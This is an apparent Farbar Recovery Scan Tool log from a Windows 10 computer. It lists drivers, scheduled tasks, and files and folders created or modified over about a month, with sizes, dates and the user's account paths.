R1 MpKsl35e5afba; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{68A47D32-4851-413D-B35D-CF273C98F251}\MpKsl35e5afba.sys [44928 2017-09-01] (Microsoft Corporation)
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvdmi.inf_amd64_1a197825c61edb6c\nvlddmkm.sys [15668664 2017-07-20] (NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-07-27] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [48064 2017-07-27] (NVIDIA Corporation)
R3 nvvhci; C:\WINDOWS\System32\drivers\nvvhci.sys [57792 2017-07-19] (NVIDIA Corporation)
S3 qcusbser; C:\WINDOWS\system32\DRIVERS\qcusbser.sys [120960 2011-07-26] (QUALCOMM Incorporated) [File not signed]
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek )
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2015-05-27] (Realsil Semiconductor Corporation)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [42856 2016-03-27] (Nefarius Software Solutions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-19] ()
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [66136 2017-02-16] (Synaptics Incorporated)
S3 taphss6; C:\WINDOWS\System32\drivers\taphss6.sys [42064 2016-11-23] (Anchorfree Inc.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-19] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-19] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-19] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-01 19:48 - 2017-09-01 19:50 - 000028316 _____ C:\Users\Aezia Aznan\Downloads\FRST.txt
2017-09-01 19:46 - 2017-09-01 19:48 - 000000000 ____D C:\FRST
2017-09-01 19:16 - 2017-09-01 19:45 - 002395648 _____ (Farbar) C:\Users\Aezia Aznan\Downloads\FRST64.exe
2017-09-01 18:40 - 2017-09-01 18:40 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-31 23:04 - 2017-08-31 23:04 - 000000000 ___HD C:\$Windows.~WS
2017-08-31 22:58 - 2017-08-31 23:00 - 000000000 ____D C:\ESD
2017-08-31 12:36 - 2017-09-01 18:43 - 099352576 _____ C:\WINDOWS\system32\config\SOFTWARE
2017-08-31 12:34 - 2017-08-31 12:34 - 000000000 ____D C:\WINDOWS\Microsoft Antimalware
2017-08-31 09:12 - 2017-08-31 09:12 - 000000000 ____D C:\Windows.old
2017-08-31 09:11 - 2017-08-31 09:11 - 000008192 _____ C:\WINDOWS\system32\config\userdiff
2017-08-31 09:11 - 2017-08-30 18:18 - 000000000 ____D C:\WINDOWS\ServiceProfiles
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files\Windows Identity Foundation
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files\Reference Assemblies
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files\MSBuild
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-08-31 09:07 - 2017-08-31 09:07 - 000000000 ____D C:\Program Files (x86)\MSBuild
2017-08-31 09:06 - 2017-02-11 02:26 - 001166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:26 - 000124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:26 - 000035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-08-31 09:06 - 2017-02-11 02:21 - 000778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:21 - 000103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-08-31 09:06 - 2017-02-11 02:21 - 000035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-08-30 22:29 - 2017-08-30 22:29 - 000000000 ___HD C:\$SysReset
2017-08-30 22:16 - 2017-09-01 18:42 - 000418928 _____ C:\WINDOWS\ntbtlog.txt
2017-08-30 19:36 - 2017-08-30 19:36 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\DBG
2017-08-30 19:03 - 2017-08-30 19:03 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2017-08-30 19:00 - 2017-08-30 19:00 - 000000020 ___SH C:\Users\Aezia Aznan\ntuser.ini
2017-08-30 18:53 - 2017-08-31 23:04 - 000022055 _____ C:\WINDOWS\diagwrn.xml
2017-08-30 18:53 - 2017-08-31 23:04 - 000011433 _____ C:\WINDOWS\diagerr.xml
2017-08-30 18:49 - 2017-09-01 18:43 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-30 18:49 - 2017-09-01 18:25 - 000004160 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{F7CF07EF-EA64-4CCB-AB8D-F401208271D2}
2017-08-30 18:49 - 2017-08-30 19:07 - 000003358 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3909864297-3729878400-1751894149-1001
2017-08-30 18:49 - 2017-08-30 18:49 - 000003458 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-30 18:49 - 2017-08-30 18:49 - 000003398 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000003234 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-08-30 18:49 - 2017-08-30 18:49 - 000003176 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002984 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002968 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002956 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002838 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002802 _____ C:\WINDOWS\System32\Tasks\ScpUpdater
2017-08-30 18:49 - 2017-08-30 18:49 - 000002786 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002744 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002420 _____ C:\WINDOWS\System32\Tasks\{F5F8BCC3-5972-4525-8741-F6E51B56A640}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002320 _____ C:\WINDOWS\System32\Tasks\{72CA1D33-A59E-4B21-80C6-621E26795DA2}
2017-08-30 18:49 - 2017-08-30 18:49 - 000002304 _____ C:\WINDOWS\System32\Tasks\Shutdown
2017-08-30 18:49 - 2017-08-30 18:49 - 000002304 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_PushButton
2017-08-30 18:49 - 2017-08-30 18:49 - 000002250 _____ C:\WINDOWS\System32\Tasks\Baidu LiveUpdate
2017-08-30 18:49 - 2017-08-30 18:49 - 000002220 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2017-08-30 18:49 - 2017-08-30 18:49 - 000002172 _____ C:\WINDOWS\System32\Tasks\UninstMiniWifi
2017-08-30 18:49 - 2017-08-30 18:49 - 000000000 ____D C:\WINDOWS\System32\Tasks\OfficeSoftwareProtectionPlatform
2017-08-30 18:46 - 2017-08-31 20:48 - 000926438 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-30 18:38 - 2017-08-30 18:38 - 000001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-08-30 18:30 - 2017-08-30 18:30 - 000000000 ____D C:\ProgramData\USOShared
2017-08-30 18:29 - 2017-08-30 18:40 - 000000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-08-30 18:26 - 2017-09-01 18:42 - 000000000 ____D C:\Users\Aezia Aznan
2017-08-30 18:24 - 2017-08-30 18:24 - 001019725 _____ C:\WINDOWS\system32\Drivers\rtwavesskdy.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000455938 _____ C:\WINDOWS\system32\Drivers\rtwavesmapro.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000031095 _____ C:\WINDOWS\system32\Drivers\rtwavesEFX.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000019678 _____ C:\WINDOWS\system32\Drivers\rtwavesmaprocap.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000010945 _____ C:\WINDOWS\system32\Drivers\rtwavesMFX.dat
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____H C:\ProgramData\DP45977C.lfl
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____D C:\WINDOWS\system32\SRSLabs
2017-08-30 18:24 - 2017-08-30 18:24 - 000000000 ____D C:\Program Files\Synaptics
2017-08-30 18:23 - 2017-09-01 18:57 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-08-30 18:23 - 2017-08-30 18:30 - 000000000 ____D C:\Program Files\Intel
2017-08-30 18:23 - 2017-08-30 18:23 - 000000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-08-30 18:23 - 2017-08-30 18:23 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-08-30 18:23 - 2017-08-30 18:23 - 000000000 ____D C:\Program Files\Realtek
2017-08-30 18:23 - 2017-08-30 18:23 - 000000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin
2017-08-30 18:23 - 2016-11-07 16:56 - 000099864 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-08-30 18:22 - 2017-09-01 18:59 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-30 18:22 - 2017-08-30 18:30 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-08-30 18:22 - 2017-08-30 18:30 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-08-30 18:22 - 2017-07-19 06:24 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-08-30 18:22 - 2017-07-19 06:24 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-08-30 18:22 - 2017-07-19 05:54 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-08-30 18:22 - 2017-07-13 08:37 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-08-30 18:22 - 2017-03-19 03:56 - 002233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-08-30 18:21 - 2017-08-30 18:30 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-08-30 18:18 - 2017-09-01 19:44 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-30 18:18 - 2017-08-30 21:39 - 000648288 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-30 17:25 - 2017-08-31 23:04 - 000000000 ___DC C:\WINDOWS\Panther
2017-08-30 17:25 - 2017-08-30 17:40 - 000000000 ___HD C:\$WINDOWS.~BT
2017-08-30 06:57 - 2017-08-30 17:24 - 000000036 _____ C:\WINDOWS\progress.ini
2017-08-30 05:54 - 2017-08-31 22:25 - 000000731 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 10 Update Assistant.lnk
2017-08-30 05:54 - 2017-08-31 22:25 - 000000719 _____ C:\Users\Aezia Aznan\Desktop\Windows 10 Update Assistant.lnk
2017-08-20 05:31 - 2017-08-30 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2017-08-20 05:31 - 2017-08-20 05:31 - 000002115 _____ C:\Users\Public\Desktop\Google Slides.lnk
2017-08-20 05:31 - 2017-08-20 05:31 - 000002113 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2017-08-20 05:31 - 2017-08-20 05:31 - 000002103 _____ C:\Users\Public\Desktop\Google Docs.lnk
2017-08-11 19:49 - 2017-08-11 19:49 - 000000743 _____ C:\Users\Public\Desktop\The Walking Dead - A New Frontier.lnk
2017-08-11 19:38 - 2017-08-11 20:42 - 000000000 ____D C:\Users\Aezia Aznan\Downloads\TWDS3
2017-08-11 05:23 - 2017-08-11 05:23 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-08-11 05:23 - 2017-07-19 05:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-08-11 05:23 - 2017-03-11 04:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-08-11 05:23 - 2017-03-11 04:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-08-11 05:23 - 2017-03-11 04:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-08-11 05:23 - 2017-03-11 04:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-08-11 05:19 - 2017-07-19 07:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-08-11 05:19 - 2017-07-19 07:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-08-11 05:19 - 2017-07-19 07:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-08-11 05:19 - 2017-07-19 07:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-08-11 05:19 - 2017-07-19 07:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-08-10 21:46 - 2017-08-10 21:46 - 000000000 ___SD C:\WINDOWS\UpdateAssistantV2
2017-08-10 21:40 - 2017-08-11 06:02 - 000016388 _____ C:\Users\Aezia Aznan\Documents\English Club.xlsx
2017-08-10 19:25 - 2017-08-10 19:25 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\UNP
2017-08-10 19:19 - 2017-08-10 19:19 - 000001414 _____ C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update and Privacy Settings.lnk
2017-08-06 16:58 - 2017-07-27 00:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-08-06 15:26 - 2017-03-28 12:37 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2017-08-06 15:26 - 2017-03-04 13:26 - 000261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-08-06 15:26 - 2017-03-04 13:18 - 000198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
2017-08-06 14:41 - 2017-08-30 18:40 - 000000000 ____D C:\WINDOWS\system32\UNP
2017-08-06 14:41 - 2017-08-06 14:42 - 000000000 ____D C:\Program Files\UNP
2017-08-06 14:41 - 2017-02-16 02:07 - 000066136 _____ (Synaptics Incorporated) C:\WINDOWS\system32\Drivers\SynRMIHID.sys
2017-08-06 14:06 - 2017-08-30 18:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-08-06 14:06 - 2017-08-06 17:01 - 000001489 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-08-06 14:06 - 2017-07-27 00:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-08-06 14:06 - 2017-07-27 00:09 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-08-06 14:05 - 2017-07-26 20:40 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-08-06 01:38 - 2017-08-06 01:48 - 000000000 ____D C:\Program Files\rempl
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-09-01 18:43 - 2017-03-18 18:40 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2017-09-01 18:36 - 2016-09-22 14:35 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\DMCache
2017-09-01 17:40 - 2016-09-22 17:00 - 000000000 ____D C:\Program Files (x86)\Steam
2017-09-01 10:56 - 2017-03-19 04:01 - 000000000 ____D C:\WINDOWS\INF
2017-09-01 10:12 - 2016-09-21 23:08 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\Packages
2017-09-01 08:41 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\appcompat
2017-08-31 22:25 - 2016-09-28 17:27 - 000000000 ____D C:\Windows10Upgrade
2017-08-31 22:23 - 2016-09-22 14:35 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\IDM
2017-08-31 20:44 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-08-31 20:29 - 2016-09-21 23:49 - 000018960 _____ (Logitech, Inc.) C:\WINDOWS\system32\Drivers\LNonPnP.sys
2017-08-31 09:17 - 2017-03-19 04:03 - 000028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-08-31 09:12 - 2017-03-19 04:06 - 000000000 ____D C:\WINDOWS\Setup
2017-08-31 09:07 - 2017-03-19 03:56 - 000389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-08-31 09:07 - 2017-03-19 03:56 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-08-31 09:07 - 2017-03-19 03:56 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-08-31 09:07 - 2017-03-19 03:56 - 000005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\system32\telnet.exe
2017-08-31 09:06 - 2017-03-19 03:56 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-08-31 09:06 - 2017-03-19 03:56 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-08-31 09:06 - 2017-03-19 03:56 - 000006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-08-31 06:01 - 2017-07-05 20:02 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\uTorrent
2017-08-31 06:01 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-31 05:55 - 2017-03-19 04:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-31 05:39 - 2017-03-19 03:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-30 21:25 - 2016-09-21 23:32 - 000000000 ____D C:\WINDOWS\SysWOW64\sda
2017-08-30 20:38 - 2017-05-25 17:05 - 000000000 ____D C:\MSI
2017-08-30 19:43 - 2016-09-22 00:22 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\CrashDumps
2017-08-30 19:07 - 2016-09-21 23:11 - 000002420 _____ C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-08-30 19:07 - 2016-09-21 23:11 - 000000000 ___RD C:\Users\Aezia Aznan\OneDrive
2017-08-30 19:00 - 2017-03-19 04:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-30 19:00 - 2016-10-03 10:31 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Local\ConnectedDevicesPlatform
2017-08-30 19:00 - 2016-02-13 20:22 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-30 18:59 - 2016-09-28 17:27 - 000000000 ___HD C:\$GetCurrent
2017-08-30 18:58 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-30 18:56 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-08-30 18:56 - 2017-03-19 04:03 - 000000000 ____D C:\WINDOWS\Registration
2017-08-30 18:56 - 2017-03-18 18:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-30 18:52 - 2016-07-16 18:47 - 000000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-08-30 18:49 - 2017-03-19 09:31 - 000000000 ____D C:\WINDOWS\HoloShell
2017-08-30 18:49 - 2016-10-03 10:23 - 000022840 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-08-30 18:48 - 2017-03-19 04:03 - 000000000 __RHD C:\Users\Public\Libraries
2017-08-30 18:46 - 2016-11-21 18:01 - 000002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-30 18:46 - 2016-09-21 23:32 - 000898608 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2017-08-30 18:40 - 2017-07-28 20:04 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NEKOPARA Vol.3
2017-08-30 18:40 - 2017-07-28 17:03 - 000000000 ____D C:\Users\Aezia Aznan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SVP 4
2017-08-30 18:40 - 2017-07-22 18:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced IP Scanner v2
2017-08-30 18:40 - 2017-07-11 20:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScpToolkit
